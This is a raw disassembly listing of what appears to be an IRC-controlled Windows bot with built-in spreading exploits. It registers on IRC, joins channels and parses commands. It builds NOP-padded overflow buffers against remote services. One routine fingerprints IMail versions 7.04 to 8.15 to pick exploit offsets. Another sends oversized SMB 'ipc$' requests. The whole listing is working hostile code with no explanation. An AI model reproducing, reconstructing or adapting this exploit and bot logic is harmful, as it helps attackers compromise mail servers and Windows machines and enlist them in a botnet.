call sub_409A32 ; strncpy
push offset aMindleak_com ; "mindleak.com"
lea eax, [ebp-3B4h]
push eax
call sub_4099AE
add esp, 14h
test al, al
jz loc_405368
lea esi, [esi+edi+1]
mov [ebp-1B4h], esi
push offset asc_401908 ; ":"
push esi
call sub_409A2C ; strstr
pop ecx
pop ecx
sub eax, esi
mov [ebp-30h], eax
push 1
pop edi
cmp eax, edi
jl loc_405368
lea esi, [esi+eax+1]
mov [ebp-1B4h], esi
push esi
lea eax, [ebp-1B0h]
push eax
call sub_409AAE ; strcpy
push ebx
lea eax, [ebp-1B0h]
push eax
call sub_409A44 ; strtok
add esp, 10h
mov [ebp-0B0h], eax
mov [ebp-2Ch], edi
loc_405266: ; CODE XREF: code:00405283�j
cmp dword ptr [ebp-2Ch], 2
jge short loc_405285
push ebx
push 0
call sub_409A44 ; strtok
pop ecx
pop ecx
mov ecx, [ebp-2Ch]
mov [ebp+ecx*4-0B0h], eax
inc dword ptr [ebp-2Ch]
jmp short loc_405266
; ---------------------------------------------------------------------------
loc_405285: ; CODE XREF: code:0040526A�j
push ds:dword_409F10
mov edi, [ebp-0B0h]
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_4052C4
push offset asc_401904 ; "*"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_4052C4
push edi
push ds:dword_409F10
call sub_4099AE
pop ecx
pop ecx
test al, al
jz loc_405368
loc_4052C4: ; CODE XREF: code:0040529B�j
; code:004052AC�j
push ds:dword_409F10
push dword ptr [ebp-24h]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4052E1
lea eax, [ebp-2B4h]
mov [ebp-24h], eax
loc_4052E1: ; CODE XREF: code:004052D6�j
push edi
call sub_409AA2 ; strlen
lea eax, [eax+esi+1]
mov [ebp-1Ch], eax
and byte ptr [ebp-20h], 0
lea eax, [ebp-28h]
push eax
call sub_404360
loc_4052FB: ; CODE XREF: code:00404F95�j
pop ecx
loc_4052FC: ; CODE XREF: code:0040512D�j
pop ecx
jmp short loc_405368
; ---------------------------------------------------------------------------
loc_4052FF: ; CODE XREF: code:00405083�j
; code:00405098�j ...
push ds:dword_409F18
call dword_4011B8 ; closesocket
jmp short loc_405368
; ---------------------------------------------------------------------------
loc_40530D: ; CODE XREF: code:00405044�j
; code:00405059�j ...
mov eax, dword_40397C
imul eax, 1Ch
push off_4016D8[eax]
push off_4016D4[eax]
push offset aJoinSS ; "JOIN %s %s\r\n"
call sub_404C8D
add esp, 0Ch
test al, al
jz short loc_405368
mov ds:byte_409EC8, 1
jmp short loc_405368
; ---------------------------------------------------------------------------
loc_40533B: ; CODE XREF: code:00405005�j
; code:0040501A�j ...
push 0Ah
push 4
call sub_409957
push eax
call sub_4098BE
add esp, 0Ch
mov ds:dword_409F10, eax
push eax
push offset aXlegion0x029 ; "xLegion/0x029"
push eax
push eax
push eax
push offset aUserSSSSNickS ; "USER %s %s %s :%s\r\nNICK %s\r\n"
call sub_404C8D
add esp, 18h
loc_405368: ; CODE XREF: code:00404F1C�j
; code:00404FF1�j ...
push esi
call sub_409A20 ; free
pop ecx
jmp short loc_405378
; ---------------------------------------------------------------------------
db 6Ah, 1, 58h
dd 0E8658BC3h
; ---------------------------------------------------------------------------
loc_405378: ; CODE XREF: code:0040536F�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea esp, [ebp-3D0h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405391: ; DATA XREF: code:off_402F54�o
push ebp
mov ebp, esp
mov eax, 1A18h
call sub_409A60
push ebx
push esi
push edi
mov edi, [ebp+8]
push 2
push dword ptr [edi+8]
call sub_4092ED
xor esi, esi
pop ecx
cmp eax, esi
pop ecx
mov [ebp-8], eax
jz loc_405677
cmp eax, 1
jz loc_405677
mov eax, [edi+4]
push 7
imul eax, 2Ch
push offset a__ ; "\r\n\\_/."
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-0A18h]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
add esp, 1Ch
cmp eax, esi
mov [ebp-4], eax
push esi
jnz short loc_405408
call dword_401088 ; ExitThread
loc_405408: ; CODE XREF: code:00405400�j
push esi
push esi
push 6
push 1
push 2
call dword_4011BC ; WSASocketA
mov [ebp+8], eax
push 10h
lea eax, [ebp-18h]
push esi
push eax
call sub_409AB4 ; memset
mov ax, [edi]
add esp, 0Ch
mov word ptr [ebp-18h], 2
push eax
call dword_4011B0 ; ntohs
mov [ebp-16h], ax
mov eax, [edi+8]
mov [ebp-14h], eax
lea eax, [ebp-18h]
push 10h
push eax
push dword ptr [ebp+8]
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40545D
call dword_401088 ; ExitThread
loc_40545D: ; CODE XREF: code:00405455�j
mov ebx, dword_4011A8
push 48h
push offset dword_401978
push dword ptr [ebp+8]
call ebx ; dword_4011A8
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40547B
call dword_401088 ; ExitThread
loc_40547B: ; CODE XREF: code:00405473�j
lea eax, [ebp-1A18h]
push 1000h
push eax
push dword ptr [ebp+8]
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_40549C
push esi
call dword_401088 ; ExitThread
loc_40549C: ; CODE XREF: code:00405493�j
mov eax, [ebp-4]
push 10h
add eax, 0D7h
pop ecx
cdq
idiv ecx
push 0Ch
mov edi, 0B3h
pop eax
sub eax, edx
jns short loc_4054B9
add edi, 10h
loc_4054B9: ; CODE XREF: code:004054B4�j
push 360h
lea eax, [ebp-818h]
push offset dword_4019F8
push eax
sub edi, edx
call sub_409ABA ; memcpy
push 10h
lea eax, [ebp-4B8h]
push offset dword_401D5C
push eax
call sub_409ABA ; memcpy
push 30h
lea eax, [ebp-4A8h]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-478h]
push 90h
push eax
call sub_409AB4 ; memset
push dword ptr [ebp-4]
lea esi, [edi+3A0h]
lea eax, [ebp-0A18h]
push eax
lea eax, [ebp+esi-818h]
push eax
call sub_409ABA ; memcpy
add esi, [ebp-4]
push 3Ch
push offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
lea eax, [ebp+esi-818h]
push eax
call sub_409ABA ; memcpy
add esp, 48h
add esi, 3Ch
push 30h
lea eax, [ebp+esi-818h]
push offset dword_401DB0
push eax
call sub_409ABA ; memcpy
mov eax, [ebp-8]
add esp, 0Ch
add esi, 30h
dec eax
jz short loc_40557B
dec eax
jz short loc_405572
dec eax
push 4
jnz short loc_405574
push offset dword_401DEC
jmp short loc_405582
; ---------------------------------------------------------------------------
loc_405572: ; CODE XREF: code:00405564�j
push 4
loc_405574: ; CODE XREF: code:00405569�j
push offset dword_401DE8
jmp short loc_405582
; ---------------------------------------------------------------------------
loc_40557B: ; CODE XREF: code:00405561�j
push 4
push offset dword_401DE4
loc_405582: ; CODE XREF: code:00405570�j
; code:00405579�j
lea eax, [ebp-484h]
push eax
call sub_409ABA ; memcpy
mov eax, [ebp-4]
mov ecx, [ebp-810h]
add esp, 0Ch
lea eax, [edi+eax+30h]
xor edi, edi
push edi
push esi
lea ecx, [ecx+eax-0Ch]
mov [ebp-810h], ecx
mov ecx, [ebp-808h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-808h], ecx
mov ecx, [ebp-798h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-798h], ecx
mov ecx, [ebp-794h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-794h], ecx
mov ecx, [ebp-764h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-764h], ecx
mov ecx, [ebp-760h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-760h], ecx
mov ecx, [ebp-748h]
lea ecx, [ecx+eax-0Ch]
mov [ebp-748h], ecx
mov ecx, [ebp-68Ch]
lea ecx, [ecx+eax-0Ch]
cdq
sub eax, edx
mov [ebp-68Ch], ecx
sar eax, 1
add [ebp-4B8h], eax
add [ebp-4B0h], eax
lea eax, [ebp-818h]
push eax
push dword ptr [ebp+8]
call ebx ; dword_4011A8
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_405645
call dword_401088 ; ExitThread
loc_405645: ; CODE XREF: code:0040563D�j
lea eax, [ebp-1A18h]
push 1000h
push eax
push dword ptr [ebp+8]
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_405666
push edi
call dword_401088 ; ExitThread
loc_405666: ; CODE XREF: code:0040565D�j
push dword ptr [ebp+8]
call sub_40867A
pop ecx
push 1
call dword_401088 ; ExitThread
loc_405677: ; CODE XREF: code:004053B7�j
; code:004053C0�j
push esi
call dword_401088 ; ExitThread
push ebp
mov ebp, esp
mov eax, 1B7Ch
call sub_409A60
push ebx
push esi
push edi
mov edi, [ebp+8]
push 7
push offset a__ ; "\r\n\\_/."
mov eax, [edi+4]
imul eax, 2Ch
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-0B7Ch]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
xor ebx, ebx
add esp, 1Ch
cmp eax, ebx
mov [ebp-4], eax
jnz short loc_4056D5
push ebx
call dword_401088 ; ExitThread
loc_4056D5: ; CODE XREF: code:004056CC�j
push 10h
lea eax, [ebp-14h]
push ebx
push eax
call sub_409AB4 ; memset
mov eax, [edi+8]
add esp, 0Ch
mov [ebp-10h], eax
mov ax, [edi]
push 2
pop esi
push eax
mov [ebp-14h], si
call dword_4011B0 ; ntohs
push ebx
push ebx
push ebx
push 6
push 1
push esi
mov [ebp-12h], ax
call dword_4011BC ; WSASocketA
mov edi, eax
cmp edi, ebx
mov [ebp+8], edi
jnz short loc_40571D
push ebx
call dword_401088 ; ExitThread
loc_40571D: ; CODE XREF: code:00405714�j
lea eax, [ebp-14h]
push 10h
push eax
push edi
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
push ebx
jnz short loc_405736
call dword_401088 ; ExitThread
loc_405736: ; CODE XREF: code:0040572E�j
push 48h
push offset dword_401E00
push edi
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
push ebx
jnz short loc_405750
call dword_401088 ; ExitThread
loc_405750: ; CODE XREF: code:00405748�j
lea eax, [ebp-1B7Ch]
push 1000h
push eax
push edi
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_40576F
push ebx
call dword_401088 ; ExitThread
loc_40576F: ; CODE XREF: code:00405766�j
mov edi, 168h
loc_405774: ; CODE XREF: code:00405789�j
push 7Ah
push 61h
call sub_409957
mov [ebp+ebx-17Ch], al
inc ebx
pop ecx
cmp ebx, edi
pop ecx
jl short loc_405774
push 0Ah
lea eax, [ebp-90h]
push offset dword_401EF0
push eax
call sub_409ABA ; memcpy
push esi
lea eax, [ebp-86h]
push offset dword_401F40
push eax
call sub_409ABA ; memcpy
push 4
lea eax, [ebp-82h]
pop ebx
push ebx
push offset dword_401F38
push eax
call sub_409ABA ; memcpy
push esi
lea eax, [ebp-4Ah]
push offset dword_401F3C
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-46h]
push offset dword_401F34
push eax
call sub_409ABA ; memcpy
push 0Bh
lea eax, [ebp-42h]
push offset dword_401EE4
push eax
call sub_409ABA ; memcpy
add esp, 48h
lea eax, [ebp-97Ch]
push 18h
push offset dword_401E4C
push eax
call sub_409ABA ; memcpy
push 44h
lea eax, [ebp-964h]
push offset dword_401E68
push eax
call sub_409ABA ; memcpy
mov esi, 90h
push 20h
lea eax, [ebp-920h]
push esi
push eax
call sub_409AB4 ; memset
push ebx
lea eax, [ebp-900h]
push offset dword_401EFC
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-8FCh]
push offset dword_401F30
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-8F8h]
push offset dword_401F28
push eax
call sub_409ABA ; memcpy
add esp, 48h
lea eax, [ebp-8F4h]
push ebx
push offset dword_401F2C
push eax
call sub_409ABA ; memcpy
push 58h
lea eax, [ebp-8F0h]
push esi
push eax
call sub_409AB4 ; memset
push 6
lea eax, [ebp-898h]
push offset dword_401F04
push eax
call sub_409ABA ; memcpy
push 8
lea eax, [ebp-892h]
push esi
push eax
call sub_409AB4 ; memset
push ebx
lea eax, [ebp-88Ah]
push offset dword_401F0C
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-886h]
push esi
push eax
call sub_409AB4 ; memset
add esp, 48h
lea eax, [ebp-882h]
push 6
push offset dword_401F14
push eax
call sub_409ABA ; memcpy
mov ebx, [ebp-4]
mov eax, 3E6h
sub eax, ebx
push eax
lea eax, [ebp-87Ch]
push esi
push eax
call sub_409AB4 ; memset
mov esi, 4E6h
lea eax, [ebp-0B7Ch]
sub esi, ebx
push ebx
push eax
lea eax, [ebp+esi-97Ch]
push eax
call sub_409ABA ; memcpy
add esi, ebx
lea eax, [ebp-17Ch]
push edi
push eax
lea eax, [ebp+esi-97Ch]
push eax
call sub_409ABA ; memcpy
add esi, edi
push 0Ah
push offset aA ; "\\A"
lea eax, [ebp+esi-97Ch]
push eax
call sub_409ABA ; memcpy
add esi, 0Ah
push 32h
push offset dword_401EB0
lea eax, [ebp+esi-97Ch]
push eax
call sub_409ABA ; memcpy
add esi, 32h
add esp, 48h
xor edi, edi
mov [ebp-974h], esi
lea eax, [esi-18h]
push edi
mov [ebp-96Ch], eax
lea eax, [ebp-97Ch]
push esi
push eax
push dword ptr [ebp+8]
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40598F
call dword_401088 ; ExitThread
loc_40598F: ; CODE XREF: code:00405987�j
lea eax, [ebp-1B7Ch]
push 1000h
push eax
push dword ptr [ebp+8]
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_4059B0
push edi
call dword_401088 ; ExitThread
loc_4059B0: ; CODE XREF: code:004059A7�j
push dword ptr [ebp+8]
call sub_40867A
pop ecx
push 1
call dword_401088 ; ExitThread
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_409AB4 ; memset
mov edi, [ebp+8]
add esp, 0Ch
mov word ptr [ebp-10h], 2
mov eax, [edi+8]
mov [ebp-0Ch], eax
mov ax, [edi]
push eax
call dword_4011B0 ; ntohs
push esi
push esi
push esi
push 6
push 1
push 2
mov [ebp-0Eh], ax
call dword_4011BC ; WSASocketA
cmp eax, esi
mov [ebp+8], eax
jnz short loc_405A18
push esi
call dword_401088 ; ExitThread
loc_405A18: ; CODE XREF: code:00405A0F�j
lea ecx, [ebp-10h]
push 10h
push ecx
push eax
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_405A31
call dword_401088 ; ExitThread
loc_405A31: ; CODE XREF: code:00405A29�j
mov ebx, 200h
lea eax, [ebp-210h]
push ebx
push eax
push dword ptr [ebp+8]
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_405A53
push esi
call dword_401088 ; ExitThread
loc_405A53: ; CODE XREF: code:00405A4A�j
lea eax, [ebp-210h]
push offset aImail7_04 ; "IMail 7.04"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz loc_405CAA
lea eax, [ebp-210h]
push offset aImail7_05 ; "IMail 7.05"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405A8C
push 1
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405A8C: ; CODE XREF: code:00405A83�j
lea eax, [ebp-210h]
push offset aImail7_06 ; "IMail 7.06"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405ABA
lea eax, [ebp-210h]
push offset aImail7_07 ; "IMail 7.07"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405AC1
loc_405ABA: ; CODE XREF: code:00405AA1�j
push 2
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405AC1: ; CODE XREF: code:00405AB8�j
lea eax, [ebp-210h]
push offset aImail7_10 ; "IMail 7.10"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405ADF
push 3
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405ADF: ; CODE XREF: code:00405AD6�j
lea eax, [ebp-210h]
push offset aImail7_11 ; "IMail 7.11"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405AFD
push 4
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405AFD: ; CODE XREF: code:00405AF4�j
lea eax, [ebp-210h]
push offset aImail7_12 ; "IMail 7.12"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405B1B
push 5
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405B1B: ; CODE XREF: code:00405B12�j
lea eax, [ebp-210h]
push offset aImail7_13 ; "IMail 7.13"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405B60
lea eax, [ebp-210h]
push offset aImail7_14 ; "IMail 7.14"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405B60
lea eax, [ebp-210h]
push offset aImail7_15 ; "IMail 7.15"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405B67
loc_405B60: ; CODE XREF: code:00405B30�j
; code:00405B47�j
push 6
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405B67: ; CODE XREF: code:00405B5E�j
lea eax, [ebp-210h]
push offset aImail8_00 ; "IMail 8.00"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405BC3
lea eax, [ebp-210h]
push offset aImail8_01 ; "IMail 8.01"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405BC3
lea eax, [ebp-210h]
push offset aImail8_02 ; "IMail 8.02"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405BC3
lea eax, [ebp-210h]
push offset aImail8_03 ; "IMail 8.03"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405BCA
loc_405BC3: ; CODE XREF: code:00405B7C�j
; code:00405B93�j ...
push 7
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405BCA: ; CODE XREF: code:00405BC1�j
lea eax, [ebp-210h]
push offset aImail8_04 ; "IMail 8.04"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405BE8
push 8
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405BE8: ; CODE XREF: code:00405BDF�j
lea eax, [ebp-210h]
push offset aImail8_05 ; "IMail 8.05"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405C06
push 9
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405C06: ; CODE XREF: code:00405BFD�j
lea eax, [ebp-210h]
push offset aImail8_10 ; "IMail 8.10"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405C24
push 0Ah
jmp loc_405CA9
; ---------------------------------------------------------------------------
loc_405C24: ; CODE XREF: code:00405C1B�j
lea eax, [ebp-210h]
push offset aImail8_11 ; "IMail 8.11"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405C3F
push 0Ch
jmp short loc_405CA9
; ---------------------------------------------------------------------------
loc_405C3F: ; CODE XREF: code:00405C39�j
lea eax, [ebp-210h]
push offset aImail8_12 ; "IMail 8.12"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405C5A
push 0Dh
jmp short loc_405CA9
; ---------------------------------------------------------------------------
loc_405C5A: ; CODE XREF: code:00405C54�j
lea eax, [ebp-210h]
push offset aImail8_13 ; "IMail 8.13"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_405C88
lea eax, [ebp-210h]
push offset aImail8_14 ; "IMail 8.14"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_405C8C
loc_405C88: ; CODE XREF: code:00405C6F�j
push 0Eh
jmp short loc_405CA9
; ---------------------------------------------------------------------------
loc_405C8C: ; CODE XREF: code:00405C86�j
lea eax, [ebp-210h]
push offset aImail8_15 ; "IMail 8.15"
push eax
call sub_409A2C ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_405D59
push 0Fh
loc_405CA9: ; CODE XREF: code:00405A87�j
; code:00405ABC�j ...
pop esi
loc_405CAA: ; CODE XREF: code:00405A68�j
mov eax, [edi+4]
push 0Bh
imul eax, 2Ch
push offset a@ ; "\r\n@$&'():*"
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-410h]
push ds:dword_409ECC
push ebx
push eax
call sub_40785C
push eax
lea eax, [ebp-410h]
push eax
push offset dword_401FD4
call sub_409ABA ; memcpy
mov eax, esi
add esp, 28h
shl eax, 3
mov ecx, dword_401F48[eax]
test ecx, ecx
jnz short loc_405D0B
lea eax, dword_401F4C[eax]
push 4
push eax
push offset dword_402284
jmp short loc_405D1E
; ---------------------------------------------------------------------------
loc_405D0B: ; CODE XREF: code:00405CF9�j
cmp ecx, 1
jnz short loc_405D26
lea eax, dword_401F4C[eax]
push 4
push eax
push offset dword_40227C
loc_405D1E: ; CODE XREF: code:00405D09�j
call sub_409ABA ; memcpy
add esp, 0Ch
loc_405D26: ; CODE XREF: code:00405D0E�j
push 0
push 37Ch
push offset dword_401FC8
push dword ptr [ebp+8]
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_405D48
push 0
call dword_401088 ; ExitThread
loc_405D48: ; CODE XREF: code:00405D3E�j
push dword ptr [ebp+8]
call dword_4011B8 ; closesocket
push 1
call dword_401088 ; ExitThread
loc_405D59: ; CODE XREF: code:00405CA1�j
push esi
call dword_401088 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D60 proc near ; CODE XREF: code:004062F8�p
; code:0040632A�p ...
var_8BB0 = byte ptr -8BB0h
var_8B48 = byte ptr -8B48h
var_6AD8 = byte ptr -6AD8h
var_6A68 = byte ptr -6A68h
var_5FA4 = byte ptr -5FA4h
var_4A00 = byte ptr -4A00h
var_49FF = byte ptr -49FFh
var_3974 = byte ptr -3974h
var_2EA8 = byte ptr -2EA8h
var_2EA7 = byte ptr -2EA7h
var_2EA4 = byte ptr -2EA4h
var_26C0 = byte ptr -26C0h
var_26B0 = byte ptr -26B0h
var_238C = byte ptr -238Ch
var_2388 = byte ptr -2388h
var_237C = byte ptr -237Ch
var_20F4 = byte ptr -20F4h
var_2078 = byte ptr -2078h
var_18A8 = byte ptr -18A8h
var_13FD = byte ptr -13FDh
var_1110 = byte ptr -1110h
var_1070 = byte ptr -1070h
var_964 = dword ptr -964h
var_954 = byte ptr -954h
var_940 = byte ptr -940h
var_300 = byte ptr -300h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_B0 = byte ptr -0B0h
var_AD = byte ptr -0ADh
var_83 = byte ptr -83h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_38 = byte ptr -38h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 8BB0h
call sub_409A60
mov eax, dword_402D18
push ebx
push esi
push edi
mov [ebp+var_10], eax
mov eax, dword_402D1C
push 7
push offset a__ ; "\r\n\\_/."
push [ebp+arg_0]
mov [ebp+var_C], eax
mov ax, ds:word_409ED2
push eax
lea eax, [ebp+var_300]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
add esp, 1Ch
mov [ebp+var_8], eax
test eax, eax
jz loc_4061A1
push [ebp+arg_C]
lea eax, [ebp+var_38]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_409AC0 ; sprintf
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_FF]
loc_405DD2: ; CODE XREF: sub_405D60+82�j
mov dl, [ebp+ecx+var_38]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_405DD2
push 60h
lea eax, [ebp+var_B0]
push offset dword_402670
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_38]
push eax
call sub_409AA2 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
call sub_409ABA ; memcpy
add esp, 1Ch
lea eax, [ebp+var_38]
push 9
push (offset aC+3)
push eax
call sub_409AA2 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_81]
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_38]
push eax
call sub_409AA2 ; strlen
add al, 1Ah
push 1
shl al, 1
mov byte ptr [ebp+arg_0+3], al
lea eax, [ebp+arg_0+3]
push eax
lea eax, [ebp+var_AD]
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_38]
push eax
call sub_409AA2 ; strlen
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_83]
push eax
call sub_409ABA ; memcpy
mov edi, [ebp+arg_8]
add esp, 2Ch
test edi, edi
push 4
pop ebx
jz loc_405F56
mov esi, 0DACh
lea eax, [ebp+var_2EA4]
push esi
push 90h
push eax
call sub_409AB4 ; memset
lea edi, ds:402A60h[edi*4]
push ebx
lea eax, [ebp+var_26C0]
push edi
push eax
call sub_409ABA ; memcpy
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_26B0]
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp+var_238C]
push offset dword_402D04
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp+var_2388]
push edi
push eax
call sub_409ABA ; memcpy
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_237C]
push eax
call sub_409ABA ; memcpy
add esp, 48h
xor ecx, ecx
lea eax, [ebp+var_49FF]
loc_405F0C: ; CODE XREF: sub_405D60+1BE�j
mov dl, [ebp+ecx+var_2EA4]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, esi
jl short loc_405F0C
and [ebp+var_2EA8], 0
and [ebp+var_2EA7], 0
mov esi, 1C52h
lea eax, [ebp+var_8BB0]
push esi
push 31h
push eax
call sub_409AB4 ; memset
push esi
lea eax, [ebp+var_6AD8]
push 31h
push eax
call sub_409AB4 ; memset
add esp, 18h
jmp short loc_405FAA
; ---------------------------------------------------------------------------
loc_405F56: ; CODE XREF: sub_405D60+123�j
push 7D0h
lea eax, [ebp+var_1110]
push 90h
push eax
call sub_409AB4 ; memset
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_1070]
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_10]
push eax
call sub_409AA2 ; strlen
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_954]
push eax
call sub_409ABA ; memcpy
mov eax, dword_402A60
add esp, 28h
mov [ebp+var_964], eax
loc_405FAA: ; CODE XREF: sub_405D60+1F4�j
push 0E29h
lea eax, [ebp+var_20F4]
push 31h
push eax
call sub_409AB4 ; memset
movsx eax, byte ptr [ebp+arg_0+3]
add esp, 0Ch
add eax, ebx
mov esi, dword_4011A8
push 0
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+arg_4]
call esi ; dword_4011A8
cmp eax, 0FFFFFFFFh
jz loc_4061A1
mov edi, dword_4011A4
mov ebx, 640h
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_4011A4
cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
push 68h
push offset dword_4026D4
push [ebp+arg_4]
call esi ; dword_4011A8
cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_4011A4
cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
push 0A0h
push offset dword_402740
push [ebp+arg_4]
call esi ; dword_4011A8
cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_4011A4
cmp eax, 0FFFFFFFFh
jz loc_4061A1
cmp [ebp+arg_8], 0
jz loc_40612A
push 68h
lea eax, [ebp+var_8BB0]
push offset dword_4028F8
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_4A00]
push 1B5Ah
push eax
lea eax, [ebp+var_8B48]
push eax
call sub_409ABA ; memcpy
push 70h
lea eax, [ebp+var_6AD8]
push offset dword_402964
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_3974]
push 0A5Eh
push eax
lea eax, [ebp+var_6A68]
push eax
call sub_409ABA ; memcpy
push 84h
lea eax, [ebp+var_5FA4]
push offset dword_4029D8
push eax
call sub_409ABA ; memcpy
add esp, 3Ch
lea eax, [ebp+var_8BB0]
push 0
push 10FCh
push eax
push [ebp+arg_4]
call esi ; dword_4011A8
cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_4011A4
